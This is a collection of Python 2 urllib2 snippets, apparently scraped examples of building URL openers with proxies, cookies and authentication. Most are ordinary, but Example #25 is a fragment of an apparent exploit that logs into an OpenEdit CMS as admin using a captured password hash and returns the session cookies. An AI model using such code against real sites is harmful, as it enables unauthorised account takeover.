Example #1
0
    def get(self,url):
        ''' get url from web site
            @param user_agent: the User-Agent segment
            '''
        url=url.strip()
        cj = cookielib.MozillaCookieJar()
        #sys.exit(0)
        try:
            cj.load(self.cookie_file)
        except:
            pass
        if not self.proxy==None:
            print "set proxy...",self.proxy
            proxy_support = urllib2.ProxyHandler(self.proxy)
            #{"http":"http://ahad-haam:3128"})
            opener = urllib2.build_opener(
                        urllib2.HTTPCookieProcessor(cj),
                        proxy_support
                    )
        else:
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))

        opener.addheaders= [('User-Agent',self.user_agent),('Range',"bytes=0-%d" % self.range)]
        try:
            stream=opener.open(url)
            return stream
        except urllib2.HTTPError,e:
            raise hyer.error.HTTPError("can't download URL:%s" % url)
Example #2
0
def open(url, query_params=None, user_agent=None, post_data=None,
         get_method=None, cookies=False, **kwargs):

    if query_params is None:
        query_params = {}

    if user_agent is None:
        user_agent = ua_aimable

    query_params.update(kwargs)

    url = prepare_url(url, query_params)

    request = urllib2.Request(url, post_data)

    if get_method is not None:
        request.get_method = lambda: get_method

    request.add_header('User-Agent', user_agent)

    if cookies:
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
    else:
        opener = urllib2.build_opener()

    return opener.open(request)
Example #3
0
def play_fourshared(url, name):
	global media_id
	xbmc.log("starting 4shared method with: %s and %s" % (name, url))
	username = '******'
	password = '******'
	cookie_file = os.path.join(__profilepath__, 'pktemp.cookies')
	media_file = os.path.join(__profilepath__, ("pktemp%d.mp3" % (media_id)))
	cj = cookielib.LWPCookieJar()
	media_id = media_id + 1

	opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
	loginurl = 'https://www.4shared.com/login?login=%s&password=%s' % (username, password)
	xbmc.log("logging in to 4shared: " + loginurl)
	resp = opener.open(loginurl)

	cj.save(cookie_file, ignore_discard=True)
	cj.load(cookie_file, ignore_discard=True)

	opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
	urllib2.install_opener(opener)

	usock = opener.open(url)
	data = usock.read()
	#media_file = usock.geturl()
	usock.close()

	fp = open(media_file, 'wb')
	fp.write(data)
	fp.close()

	#play_stream(media_file, name)
	print "playing stream name: " + str(name) + " url: " + str(media_file)
	listitem = xbmcgui.ListItem( label = str(name), iconImage = "DefaultVideo.png", thumbnailImage = xbmc.getInfoImage( "ListItem.Thumb" ), path=media_file )
	listitem.setInfo( type="Music", infoLabels={ "Title": name } )
	xbmc.Player( xbmc.PLAYER_CORE_DVDPLAYER ).play( str(media_file), listitem)
Example #4
0
    def send(self, uri, data=''):
        url = self.base_url + str(uri)
        req = urllib2.Request(url)
        # cookie enabled
        if self.cookie == '':
            self.cookie = cookielib.CookieJar()

        cookie_handler = urllib2.HTTPCookieProcessor(self.cookie)

        if self.debug:
            http_handler = urllib2.HTTPHandler(debuglevel=1)
            opener = urllib2.build_opener(cookie_handler, http_handler)
        else:
            opener = urllib2.build_opener(cookie_handler)

        req.add_header('User-Agent', 'Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0')
        req.add_header('Content-Type', 'application/x-www-form-urlencoded')
        req.add_header('Cache-Control', 'no-cache')
        req.add_header('Accept', '*/*')
        req.add_header('Connection', 'close')
        # post data
        if data:
            post_data = urllib.urlencode(data)
            req.add_data(post_data)
            req.add_header('Content-Length', len(post_data))
        try:
            response = opener.open(req)
        except urllib2.URLError, error:
            raise FetionError(400)
            exit()
    def __init__(self, server_url, user_id, device_id, client_version,
                 proxies=None, proxy_exceptions=None,
                 password=None, token=None, repository="default",
                 ignored_prefixes=None, ignored_suffixes=None,
                 timeout=20, blob_timeout=None, cookie_jar=None,
                 upload_tmp_dir=None):
        self.timeout = timeout
        self.blob_timeout = blob_timeout
        if ignored_prefixes is not None:
            self.ignored_prefixes = ignored_prefixes
        else:
            self.ignored_prefixes = DEFAULT_IGNORED_PREFIXES

        if ignored_suffixes is not None:
            self.ignored_suffixes = ignored_suffixes
        else:
            self.ignored_suffixes = DEFAULT_IGNORED_SUFFIXES

        self.upload_tmp_dir = (upload_tmp_dir if upload_tmp_dir is not None
                               else tempfile.gettempdir())

        if not server_url.endswith('/'):
            server_url += '/'
        self.server_url = server_url

        # TODO: actually use the repository info in the requests
        self.repository = repository

        self.user_id = user_id
        self.device_id = device_id
        self.client_version = client_version
        self._update_auth(password=password, token=token)

        self.cookie_jar = cookie_jar
        cookie_processor = urllib2.HTTPCookieProcessor(
            cookiejar=cookie_jar)

        # Get proxy handler
        proxy_handler = get_proxy_handler(proxies,
                                          proxy_exceptions=proxy_exceptions,
                                          url=self.server_url)

        # Build URL openers
        self.opener = urllib2.build_opener(cookie_processor, proxy_handler)
        self.streaming_opener = urllib2.build_opener(cookie_processor,
                                                     proxy_handler,
                                                     *get_handlers())

        # Set Proxy flag
        self.is_proxy = False
        for handler in self.opener.handlers:
            if isinstance(handler, ProxyHandler):
                if handler.proxies:
                    self.is_proxy = True

        self.automation_url = server_url + 'site/automation/'
        self.batch_upload_url = 'batch/upload'
        self.batch_execute_url = 'batch/execute'

        self.fetch_api()
Example #6
0
 def create_opener(self):
     """
         creates http-link opener based on options choosen
     """
     self.opener = urllib2.build_opener()
     if not self.allow_redirects:
         self.opener = urllib2.build_opener(BalerionRedirectHandler)    
	def getResponseMixedData(self, url, secureToken, dic, additionalOptions=None):
		"Method sets up a REST call with mixed body data such as multipart/form-data."
		
		# check whether proxy is given
		if "proxy" in globals():
			proxy_handler = urllib2.ProxyHandler(self.config.proxy)
			opener = urllib2.build_opener(proxy_handler)
			urllib2.install_opener(opener)
				
		multipart = urllib2.build_opener(MultipartPostHandler.MultipartPostHandler)
		urllib2.install_opener(multipart)
		
		req = urllib2.Request(url, dic.parameters())

		req.add_header('Authorization', self.config.SDK_AUTH+",oauth_token=\""+secureToken+"\"")
		req.add_header('User-Agent', self.config.SDK_VERSION)
		req.add_header('Accept', 'application/json')
		
		# sets additional header fields
		if additionalOptions != None:
			for key in additionalOptions:
				req.add_header(key, additionalOptions[key])
		
		try:
			response = urllib2.urlopen(req)
			
			response = json.loads(response.read())	
			
			return response
		
		except urllib2.HTTPError as e:
			
			raise TelekomException(json.loads(e.read()))
Example #8
0
 def __init__(self, url, close=True, proxy=None, post=None, mobile=False, referer=None, cookie=None, output='', timeout='10'):
     if not proxy is None:
         proxy_handler = urllib2.ProxyHandler({'http':'%s' % (proxy)})
         opener = urllib2.build_opener(proxy_handler, urllib2.HTTPHandler)
         opener = urllib2.install_opener(opener)
     if output == 'cookie' or not close == True:
         import cookielib
         cookie_handler = urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())
         opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
         opener = urllib2.install_opener(opener)
     if not post is None:
         request = urllib2.Request(url, post)
     else:
         request = urllib2.Request(url,None)
     if mobile == True:
         request.add_header('User-Agent', 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/6531.22.7')
     else:
         request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0')
     if not referer is None:
         request.add_header('Referer', referer)
     if not cookie is None:
         request.add_header('cookie', cookie)
     response = urllib2.urlopen(request, timeout=int(timeout))
     if output == 'cookie':
         result = str(response.headers.get('Set-Cookie'))
     elif output == 'geturl':
         result = response.geturl()
     else:
         result = response.read()
     if close == True:
         response.close()
     self.result = result
Example #9
0
	def serveFile(self, fURL, sendData, httphandler = None):
		cj = cookielib.LWPCookieJar(ustvpaths.COOKIE) 
		if httphandler is None:
			opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
		else:
			opener = urllib2.build_opener(httphandler, urllib2.HTTPCookieProcessor(cj))
		request = urllib2.Request(url = fURL)
		opener.addheaders = []
		d = {}
		sheaders = self.decodeHeaderString(''.join(self.headers.headers))
		for key in sheaders:
			d[key] = sheaders[key]
			if (key != 'Host'):
				opener.addheaders = [(key, sheaders[key])]
			if (key == 'User-Agent'):
				opener.addheaders = [('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0')]
		if os.path.isfile(ustvpaths.COOKIE):
			cj.load(ignore_discard = True)
			cj.add_cookie_header(request)
		response = opener.open(request, timeout = TIMEOUT)
		self.send_response(200)
		headers = response.info()
		for key in headers:
			try:
				val = headers[key]
				self.send_header(key, val)
			except Exception, e:
				print e
				pass
Example #10
0
def BuildURLOpener(server):
    """
    if there should be no proxy used use an empty proxy_handler - only necessary in Windows,
    where IE proxy settings are used automatically if available
    In UNIX $HTTP_PROXY will be used
    The MultipartPostHandler is needed for submitting multipart forms from Opsview
    """
    # trying with changed digest/basic auth order as some digest auth servers do not
    # seem to work wi the previous way
    if str(server.use_proxy) == "False":
        server.proxy_handler = urllib2.ProxyHandler({})
        urlopener = urllib2.build_opener(server.digest_handler,\
                                         server.basic_handler,\
                                         server.proxy_handler,\
                                         urllib2.HTTPCookieProcessor(server.Cookie),\
                                         MultipartPostHandler)
    elif str(server.use_proxy) == "True":
        if str(server.use_proxy_from_os) == "True":
            urlopener = urllib2.build_opener(server.digest_handler,\
                                             server.basic_handler,\
                                             urllib2.HTTPCookieProcessor(server.Cookie),\
                                             MultipartPostHandler)
        else:
            # if proxy from OS is not used there is to add a authenticated proxy handler
            server.passman.add_password(None, server.proxy_address, server.proxy_username, server.proxy_password)
            server.proxy_handler = urllib2.ProxyHandler({"http": server.proxy_address, "https": server.proxy_address})
            server.proxy_auth_handler = urllib2.ProxyBasicAuthHandler(server.passman)
            urlopener = urllib2.build_opener(server.proxy_handler,\
                                            server.proxy_auth_handler,\
                                            server.digest_handler,\
                                            server.basic_handler,\
                                            urllib2.HTTPCookieProcessor(server.Cookie),\
                                            MultipartPostHandler)
    return urlopener
    def get_html(self):

        # add cookile support
        cookie = cookielib.CookieJar()
        cookie_handler = urllib2.HTTPCookieProcessor(cookie)

        if self.agents:
            agent = choice(self.agents)
        else:
            agent = None

        # add agent support
        if agent:
            proxy_handler = urllib2.ProxyHandler({'http': agent})
            # proxy_handler = urllib2.ProxyHandler({'https': agent})
            opener = urllib2.build_opener(cookie_handler, proxy_handler)
        else:
            opener = urllib2.build_opener(cookie_handler)

        urllib2.install_opener(opener)
        try:
            datas = []
            for url in self.get_urls:
                req = urllib2.Request(url, headers=self.header)
                html = urllib2.urlopen(req, timeout=30).read()
                # add chinese support
                code = chardet.detect(html)['encoding']
                if code in self.zh_code:
                    html = html.decode('GBK').encode('utf-8')
                datas.append(html)
            return datas
        except Exception as e:
            raise Exception(e)
Example #12
0
 def send(self, req):
     # req is our own Request object
     if HTTP_DEBUG:
         opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie_jar), urllib2.HTTPHandler(debuglevel=1))
     elif COOKIES_ENABLED:
         opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie_jar))
     else:
         opener = urllib2.build_opener()
     if req.method.upper() == 'POST':
         request = urllib2.Request(req.url, req.body, req.headers)
     else:  
         request = urllib2.Request(req.url, None, req.headers)  # urllib2 assumes a GET if no data is supplied.  PUT and DELETE are not supported
     
     # timed message send+receive (TTLB)
     req_start_time = self.default_timer()
     try:
         resp = opener.open(request)  # this sends the HTTP request and returns as soon as it is done connecting and sending
         connect_end_time = self.default_timer()
         content = resp.read()
         req_end_time = self.default_timer()
     except httplib.HTTPException, e:  # this can happen on an incomplete read, just catch all HTTPException
         connect_end_time = self.default_timer()
         resp = ErrorResponse()
         resp.code = 0
         resp.msg = str(e)
         resp.headers = {}
         content = ''
Example #13
0
    def getResult(self, ip, cookieHandle, fileID):
        try:

            user_agent = random.choice(self.user_agents)
            proxy = urllib2.ProxyHandler({'http':''+ ip +''})
            opener = urllib2.build_opener(proxy)
            opener.addheaders = [
                ('User_agent',user_agent),
                ('Referer','http://www.sufile.com/down/'+fileID+'.html'),
                ('Host','www.sufile.com'),
                ('DNT','1')
            ]

            opener = urllib2.build_opener(cookieHandle)
            r = opener.open('http://www.sufile.com/dd.php?file_key='+fileID+'&p=0', timeout=10)
            d = r.read()

            with open('./result.html', 'wb') as f:
                f.write(d)


            p = re.compile('<a id="downs" href="(.*?)"', re.S)
            r = re.search(p, d)
            print r.group(1).strip()


        except urllib2.HTTPError, e:
            print 'HTTPError: ' + str(e.code)
            return False
Example #14
0
 def testCreateItem(self):
     """ Ensure that items can be created
     """
     # first, retrieve an item template
     my_opener = urllib2.build_opener(MyHTTPSHandler(self.item_templt, 200))
     z.urllib2.install_opener(my_opener)
     zot = z.Zotero('myuserID', 'myuserkey')
     t = zot.item_template('book')
     # Update the item type
     t['itemType'] = 'journalArticle'
     # Add keys which should be removed before the data is sent
     t['key'] = 'KEYABC123'
     t['etag'] = 'TAGABC123'
     t['group_id'] = 'GROUPABC123'
     t['updated'] = '14 March, 2011'
     # new opener which will return 403
     my_opener = urllib2.build_opener(MyHTTPSHandler(self.items_doc, 403))
     z.urllib2.install_opener(my_opener)
     with self.assertRaises(z.ze.UserNotAuthorised) as e:
         _ = zot.create_items([t])
     exc = str(e.exception)
     # this test is a kludge; we're checking the POST data in the 403 response
     self.assertIn("journalArticle", exc)
     self.assertNotIn("KEYABC123", exc)
     self.assertNotIn("TAGABC123", exc)
     self.assertNotIn("GROUPABC123", exc)
     self.assertNotIn("updated", exc)
Example #15
0
    def __init__ (self, base, params, user=None, password=None):
        self.base    = base
        if self.base[-1] not in "?&":
            if "?" in self.base:
                self.base += "&"
            else:
                self.base += "?"

        self.params  = {}
        if user is not None and password is not None:
           x = urllib2.HTTPPasswordMgrWithDefaultRealm()
           x.add_password(None, base, user, password)
           self.client  = urllib2.build_opener()
           auth = urllib2.HTTPBasicAuthHandler(x)
           self.client  = urllib2.build_opener(auth)
        else:
           self.client  = urllib2.build_opener()

        for key, val in self.defaultParams.items():
            if self.base.lower().rfind("%s=" % key.lower()) == -1:
                self.params[key] = val
        for key in self.fields:
            if params.has_key(key):
                self.params[key] = params[key]
            elif self.base.lower().rfind("%s=" % key.lower()) == -1:
                self.params[key] = ""
Example #16
0
 def __checkAndSetUrlLib(self):
     '''
     Private member function called for Analyzing and setting Proxy settings for the urllib2. 
     
     This helps in accessing and downloading the contenst from the web for later processing and
     parsing of the contents.
     '''
     __proxy = None
     __auth = None
     __opener = None
     
     if ( self.__checkKey('_proxy')):
         __proxy = urllib2.ProxyHandler({'http':self.__dict__['_proxy'], 'https':self.__dict__['_proxy']})
         __opener = urllib2.build_opener(__proxy)
         
     if ( self.__checkKey('_username') and self.__checkKey('_password')):
         passManager = urllib2.HTTPPasswordMgrWithDefaultRealm()
         if ( self.__checkKey('_auth_base')):
             passManager.add_password(None, self.__dict__['_auth_base'], self.__dict__['_username'], self.__dict__['_password'])
         else:
             passManager.add_password(None, self.__dict__['_url'], self.__dict__['_username'], self.__dict__['_password'])
         
         __auth = urllib2.HTTPBasicAuthHandler(passManager)
         __opener = urllib2.build_opener(__auth)
         
     if ( __opener != None ):
         urllib2.install_opener(__opener)
Example #17
0
File: web.py Project: Haus1/willie
def get_urllib_object(uri, timeout, headers=None, verify_ssl=True, data=None):
    """Return a urllib2 object for `uri` and `timeout` and `headers`.

    This is better than using urlib2 directly, for it handles SSL verifcation, makes
    sure URI is utf8, and is shorter and easier to use.  Modules may use this
    if they need a urllib2 object to execute .read() on.

    For more information, refer to the urllib2 documentation.

    """

    uri = quote_query(uri)
    original_headers = {'Accept': '*/*', 'User-Agent': 'Mozilla/5.0 (Willie)'}
    if headers is not None:
        original_headers.update(headers)
    else:
        headers = original_headers
    if verify_ssl:
        opener = urllib2.build_opener(VerifiedHTTPSHandler)
    else:
        opener = urllib2.build_opener()
    req = urllib2.Request(uri, headers=headers, data=data)
    try:
        u = opener.open(req, None, timeout)
    except urllib2.HTTPError as e:
        # Even when there's an error (say HTTP 404), return page contents
        return e.fp

    return u
Example #18
0
	def __init__(self, username, password):
		self.username = username
		self.password = password
		self.pcid = ""
		cj = cookielib.CookieJar()
		cookie_support = urllib2.HTTPCookieProcessor(cj)

		# 添加代理ip
		proxy_enabled = 0
		self.iplist = []
		try:
			cur_dir = os.path.dirname(os.path.realpath(__file__))
			for line in open(os.path.join(cur_dir, r'f:/getip.ip'), 'r'):
				self.iplist += [line.strip()]
		except IOError:
			print "IOError in sethp opening getip.ip"
			pass
		if len(self.iplist) and proxy_enabled:
			ip = random.choice(self.iplist)
			print ip, type(ip)
			proxy_support = urllib2.ProxyHandler({'http':'http://'+ip})
			# self.opener = urllib2.build_opener( proxy_support, cookie_support, urllib2.HTTPHandler)
			self.opener = urllib2.build_opener( proxy_support, cookie_support, urllib2.HTTPHandler )
			# self.opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler)
			# self.opener = urllib2.build_opener(proxy)
		else:
			self.opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler)
		urllib2.install_opener(self.opener)
Example #19
0
def getContent(target_url, cert_path, key_path, post_data=None, debug=False, adfslogin=None):
  opener = urllib2.build_opener(urllib2.HTTPSHandler())
  if adfslogin:
    opener.addheaders = [('Adfs-Login', adfslogin)] #local version of tc test
  
  #try to access the url first
  try:
    content = getResponseContent(opener, target_url, post_data, debug)
    if not 'Sign in with your CERN account' in content:
      return content
  except Exception:
    if debug:
      sys.stderr.write("The request has an error, will try to create a new cookie\n")

  cookie = cookielib.CookieJar()
  opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie), HTTPSClientAuthHandler(key_path, cert_path))  #will use private key and ceritifcate
  if debug:
    sys.stderr.write("The return page is sso login page, will request cookie.")
  hasCookie = False
  # if the access gave an exception, try to get a cookie
  try:
    getSSOCookie(opener, target_url, cookie, debug)
    hasCookie = True 
    result = getResponseContent(opener, target_url, post_data, debug)
  except Exception as e:
    result = ""
    print(sys.stderr.write("ERROR:"+str(e)))
  if hasCookie:
    burl = getParentURL(target_url)
    try:
      _getResponse(opener, burl+"signOut").read()
      _getResponse(opener, "https://login.cern.ch/adfs/ls/?wa=wsignout1.0").read()
    except:
      sys.stderr.write("Error, could not logout correctly from server") 
  return result
Example #20
0
    def _request(self, url, data=None, method=None):
        """Send an HTTP request to the remote server.

        Args:
          method - A string for the HTTP method to send the request with.
          url - The URL to send the request to.
          body - The message body to send.

        Returns:
          A dictionary with the server's parsed JSON response.
        """
        LOGGER.debug('%s %s %s' % (method, url, data))

        parsed_url = urlparse.urlparse(url)
        auth = None
        password_manager = None
        if parsed_url.username:
            netloc = parsed_url.hostname
            if parsed_url.port:
                netloc += ":%s" % parsed_url.port
            cleaned_url = urlparse.urlunparse((parsed_url.scheme, netloc, parsed_url.path,
                parsed_url.params, parsed_url.query, parsed_url.fragment))
            password_manager = urllib2.HTTPPasswordMgrWithDefaultRealm()
            password_manager.add_password(None, "%s://%s" % (parsed_url.scheme, netloc), parsed_url.username, parsed_url.password)
            request = Request(cleaned_url, data=data, method=method)
        else:
            request = Request(url, data=data, method=method)


        request.add_header('Accept', 'application/json')

        if password_manager:
            opener = urllib2.build_opener(urllib2.HTTPRedirectHandler(),
                                          HttpErrorHandler(),
                                          urllib2.HTTPBasicAuthHandler(password_manager))
        else:
            opener = urllib2.build_opener(urllib2.HTTPRedirectHandler(),
                                          HttpErrorHandler())
        response = opener.open(request)
        try:
            if response.code > 399 and response.code < 500:
                return {'status': response.code, 'value': response.read()}
            body = response.read().replace('\x00', '').strip()
            content_type = response.info().getheader('Content-Type') or []
            if 'application/json' in content_type:
                data = utils.load_json(body.strip())
                assert type(data) is dict, (
                    'Invalid server response body: %s' % body)
                assert 'status' in data, (
                    'Invalid server response; no status: %s' % body)
                # Some of the drivers incorrectly return a response
                # with no 'value' field when they should return null.
                if 'value' not in data:
                    data['value'] = None
                return data
            elif 'image/png' in content_type:
                data = {'status': 0, 'value': body.strip()}
                return data
        finally:
            response.close()
Example #21
0
def http_send(url, body="", exheaders="", method=False, proxy_info=False):
	headers = {
			"Connection": "Keep-Alive",
			"Cache-Control": "no-cache" 
	}
	headers.update(exheaders)
	
	if not proxy_info:
		proxy_info = get_proxy_info()
		
	if proxy_info:
		proxy_support = urllib2.ProxyHandler(
											{"http":"http://%(user)s:%(pass)s@%(host)s:%(port)d" % proxy_info})
		opener = urllib2.build_opener(proxy_support)
	else:
		opener = urllib2.build_opener()
	
	urllib2.install_opener(opener)
	
	if(body == None or len(body.strip()) == 0):
		request = urllib2.Request(url, headers=headers)
	else:
		request = urllib2.Request(url, headers=headers, data=body)
	
	try:
		conn = urllib2.urlopen(request)
	except Exception, e:
		print "[Error] Failed while http send.", e
		print "Retry......"
		
		try:
			conn = urllib2.urlopen(request)
		except Exception, e:
			print "[Error] Retry failed while http send.", e
			return None
Example #22
0
def notify(field, args) :
    if peer == '':
        return
    #args['token'] = token
    if debug :
        log = open('/tmp/ticket_listener', 'a')
        log.writelines('in \n')
    if not functions.has_key(field) :
        return
    url = peer + functions[field]
    postData=json.dumps(args)
    if use_htaccess :
        passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
        passman.add_password(None, url, htaccess['login'], htaccess['pwd'])
        authhandler = urllib2.HTTPBasicAuthHandler(passman)
        opener = urllib2.build_opener(authhandler)
    else :
        opener = urllib2.build_opener()
    req =  urllib2.Request(url, postData, {'Content-Type': 'application/json'})
    urllib2.install_opener(opener)
    res = urllib2.urlopen(req)
    if debug :
        log.writelines('url : %s\nPOST data : %s\nresponse : %s\ninfo : %s'%(url, str(args), res.read(), res.info()))
        log.writelines('out \n')
        log.close()
Example #23
0
    def refresh_feed(self, rssurl):
        """
        Parses through the content of rss feed, using a proxy, if configured,
        uses cache for the feed content if memcached is in use.

        :param str rssurl: URL to RSS Feed
        :returns: List of RSS entries
        """
        headers = []

        opener = urllib2.build_opener()
        proxy = self.http_proxy

        # If proxy set, add custom handlers
        if proxy:
            urlinfo = urlparse(proxy)
            proxyhandler = urllib2.ProxyHandler({urlinfo.scheme : proxy})
            opener = urllib2.build_opener(proxyhandler, urllib2.HTTPHandler, urllib2.HTTPSHandler)

        # TODO: Use feedparser
        xml = minidom.parse(opener.open(rssurl))
        if xml:
            root = xml.documentElement
            for node in root.childNodes:
                if node.nodeName == "item":
                    headers.append(self.get_header(node))
                if node.nodeName == "channel":
                    for channel_child in node.childNodes:
                        if channel_child.nodeName == "item":
                            headers.append(self.get_header(channel_child))

        return headers
Example #24
0
 def getOpener(self):
     #return the opener
     cj=cookielib.CookieJar()
     if self.__proxy is not None:
         return urllib2.build_opener(urllib2.ProxyHandler({"http":self.__proxy}),urllib2.HTTPCookieProcessor(cj))
     else:
         return urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) 
Example #25
0
def doLogin(adminHash):
	sys.stdout.write("(+) Logging into CMS.. ")
	sys.stdout.flush
	adminIndex = "http://" + options.target + options.dirPath + "openedit/authentication/logon.html"
	values = {'loginokpage' : '', 'accountname' : 'admin', 'password' : adminHash, 'submit' : 'Login'}
	data = urllib.urlencode(values)
	cj = CookieJar()
    	if options.proxy:
        	try:
            		opener = urllib2.build_opener(getProxy(), urllib2.HTTPCookieProcessor(cj))
                        opener.addheaders = [('User-agent', agent)]
	            	check = opener.open(adminIndex, data).read()
        	except:
            		print "\n(-) Proxy connection failed to remote target"
            		sys.exit(1)
    	else:
        	try:
            		opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
            		check = opener.open(adminIndex, data).read()
            	except:
            		print "(-) Target connection failed, check your address"
            		sys.exit(1)
	if not re.search("Please enter your password", check):
        	sys.stdout.write("logged in successfully\n")
        	sys.stdout.flush()
		return cj
    	else:
        	sys.stdout.write("Login Failed! Exiting..\n")
        	sys.stdout.flush()
        	sys.exit(1)
Example #26
0
File: net.py Project: newagemusic/b
    def call_service(self):
        """调用远程服务"""
        try:
            encode_data = None
            if self.params is not None:
                if self.method == 'GET':
                    self.url += '?' + urlencode(self.params)
                    log_debug(self.url)

                elif self.method == 'POST':
                    encode_data = urlencode(self.params)

            opener = urllib2.build_opener()
            opener.addheaders = self.headers
            
            if self.cookie_jar is not None:
                opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie_jar))

            res_obj = opener.open(self.url, data=encode_data, timeout=self.timeout)
            self.set_cookie = res_obj.info().getheader('Set-Cookie')
            self.res = res_obj.read()

            # encoding
            self.encoding = guess_json_utf(self.res)
            if self.encoding:
                self.res = self.res.decode(self.encoding)

            self.json = json.loads(self.res)
            self.ret  = self.json.get('ret')
            self.msg  = self.json.get('msg')
            self.data = self.json.get('data')
        except Exception, e:
            #log_error('[JSONService] url:%s, response:%s, expetion:%s' % (self.url, self.res, e))
            return False
Example #27
0
def continuity(url):
    import md5
    format = '%25s: %s'

    # first fetch the file with the normal http handler
    opener = urllib2.build_opener()
    urllib2.install_opener(opener)
    fo = urllib2.urlopen(url)
    foo = fo.read()
    fo.close()
    m = md5.new(foo)
    print format % ('normal urllib', m.hexdigest())

    # now install the keepalive handler and try again
    opener = urllib2.build_opener(HTTPHandler())
    urllib2.install_opener(opener)

    fo = urllib2.urlopen(url)
    foo = fo.read()
    fo.close()
    m = md5.new(foo)
    print format % ('keepalive read', m.hexdigest())

    fo = urllib2.urlopen(url)
    foo = ''
    while 1:
        f = fo.readline()
        if f: foo = foo + f
        else: break
    fo.close()
    m = md5.new(foo)
    print format % ('keepalive readline', m.hexdigest())
Example #28
0
def send_web_socket(Cookie_Jar,url_to_call):
    try:
        import urllib2
        import base64
        import uuid
        req = urllib2.Request(url_to_call)

        str_guid=str(uuid.uuid1()).upper()
        str_guid=base64.b64encode(str_guid)
        req.add_header('Connection', 'Upgrade')
        req.add_header('Upgrade', 'websocket')

        req.add_header('Sec-WebSocket-Key', str_guid)
        req.add_header('Origin','http://www.streamafrik.com')
        req.add_header('Pragma','no-cache')
        req.add_header('Cache-Control','no-cache')
        req.add_header('Sec-WebSocket-Version', '13')
        req.add_header('Sec-WebSocket-Extensions', 'permessage-deflate; client_max_window_bits, x-webkit-deflate-frame')
        req.add_header('User-Agent','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53')
        cookie_handler = urllib2.HTTPCookieProcessor(Cookie_Jar)
        opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
        opener = urllib2.install_opener(opener)
        from keepalive import HTTPHandler
        keepalive_handler = HTTPHandler()
        opener = urllib2.build_opener(keepalive_handler)
        urllib2.install_opener(opener)
        urllib2.urlopen(req)
        response.close()
        return ''
    except: traceback.print_exc(file=sys.stdout)
    return ''
Example #29
0
def loadUrl(url, profiler, enable_proxy = False):
    loadtime = 0
    try:
        begin = time.time()
        req = urllib2.Request(url)
        req.add_header("User-Agent", "Mozilla/5.0 (Linux; Android 5.1.1; Nexus 5 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36")
        req.add_header("Accept-Encoding", "gzip,deflate,sdch")
        req.add_header("Accept", "*/*")
        req.add_header("Cache-Control", "no-cache")
        if enable_proxy:
            print "USE Turbo Proxy!!!"
            proxy_handler = urllib2.ProxyHandler({"http": turbo_local_proxy})
            opener =  urllib2.build_opener(proxy_handler)
        else:
            opener =  urllib2.build_opener()
        resp = opener.open(req, timeout = 1000000)
        cntype = resp.headers.getheader("content-type")
        print "content-type", cntype
        print "status code", resp.getcode()
        # print "headers", resp.headers
        size = len(resp.read())
        loadtime = time.time() - begin
        print "page size", size
        print "loadtime is ", loadtime
        profiler.addSize(size)
        profiler.addRescources(url, resp.getcode() ,cntype, int(loadtime * 1000))
        return loadtime
    except ValueError:
        pass
    finally:
        opener.close()
Example #30
0
def get_urlopen():
    proxy_type = get_prefs('proxy_type');
    if proxy_type == 'http':
        scheme = 'http'
        host = str(get_prefs('proxy_host'))
        port = str(get_prefs('proxy_port'))
        url = scheme + '://' + host + ':' + port
        if get_prefs('proxy_auth'):
            proxy_support = urllib2.ProxyHandler({ 'http': url, 'https': url })
            username = str(get_prefs('proxy_auth_name'))
            password = str(get_prefs('proxy_auth_password'))
            auth_handler = urllib2.ProxyBasicAuthHandler()
            auth_handler.add_password(None, url, username, password)
            return urllib2.build_opener(proxy_support, auth_handler).open
        else:
            proxy_support = urllib2.ProxyHandler({ 'http': url, 'https': url })
            return urllib2.build_opener(proxy_support).open
    elif proxy_type == 'system':
        if 'http_proxy' in os.environ and os.environ["http_proxy"]:
            url = os.environ["http_proxy"]
        elif 'HTTP_PROXY' in os.environ and os.environ["HTTP_PROXY"]:
            url = os.environ["HTTP_PROXY"]
        else:
            url = None

        if not url:
            return urllib2.urlopen
        else:
            proxy_support = urllib2.ProxyHandler({ 'http': url, 'https': url })
            return urllib2.build_opener(proxy_support).open
    else:
        return urllib2.urlopen
Example #31
0
 def __init__(self):
     opener = urllib2.build_opener()
     # Set User-Agent
     opener.addheaders = [('User-Agent', self.__USERAGENT)]
     urllib2.install_opener(opener)
Example #32
0
def read_config(config_file):
    global config

    if not os.path.isfile(config_file):
        exit("[!] missing configuration file '%s'" % config_file)
    else:
        print "[i] using configuration file '%s'" % config_file

    config.clear()

    try:
        array = None
        content = open(config_file, "rb").read()

        for line in content.split("\n"):
            line = line.strip('\r')
            line = re.sub(r"\s*#.*", "", line)
            if not line.strip():
                continue

            if line.count(' ') == 0:
                if re.search(r"[^\w]", line):
                    if array == "USERS":
                        exit(
                            "[!] invalid USERS entry '%s'\n[?] (hint: add whitespace at start of line)"
                            % line)
                    else:
